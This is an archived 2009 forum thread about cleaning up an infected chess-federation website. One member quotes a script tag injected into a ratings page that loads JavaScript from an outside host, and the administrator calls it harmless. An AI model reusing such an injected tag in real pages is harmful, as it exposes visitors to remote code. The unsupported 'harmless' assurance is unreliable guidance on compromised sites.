PDA

View Full Version : Site infection fixed



Christopher Mallon
12-29-2009, 12:15 PM
For those of you who have been experiencing a reported attack site warning from Google or Firefox, we have managed to completely remove the infection as of December 29th and so the site is now safe to visit. We anticipate that the warning will be removed shortly once they have time to scan our site again.

I am still in the process of updating all of the pages to account for some of the changes, so some links are broken - the very first thing I did was totally delete the pages causing the vulnerabilities, which in fact were not even being officially used anymore.

Ellen Nadeau
12-29-2009, 01:18 PM
Hi Chris, this is great news. Was the CFC store a problem to fix? What time delay should we expect for unblocked access for customers?
Thanks,
Ellen

Egidijus Zeromskis
12-29-2009, 01:33 PM
we have managed to completely remove the infection as of December 29th

Strangely, the http://www.chess.ca/memberinfoSQL.asp?CFCN=147297
(my son's rating statistics through SQL) still gives errors and a code has "script src=http://a0v.org/x.js></script" Good luck removing these as well (probably by removing SQL completely)

Christopher Mallon
12-29-2009, 01:43 PM
Thanks for pointing that one out, I'll see what I can do about it.

Christopher Mallon
12-29-2009, 02:06 PM
OK the a0v link turns out to be harmless. Of course we still want to get rid of it and I'm working on that, but you don't need to worry about ratings pages infecting your system.

Ellen Nadeau
12-29-2009, 02:26 PM
And the chess store? Did you clean it up?

Christopher Mallon
12-29-2009, 02:40 PM
I don't have access to the store. Is it also infected? The warning is likely a carry over from being hosted on chess.ca

Christopher Mallon
12-29-2009, 02:52 PM
I cleaned it up with a sort of temp fix... we'll have to clean it up out of the database too but it's gone on your end now.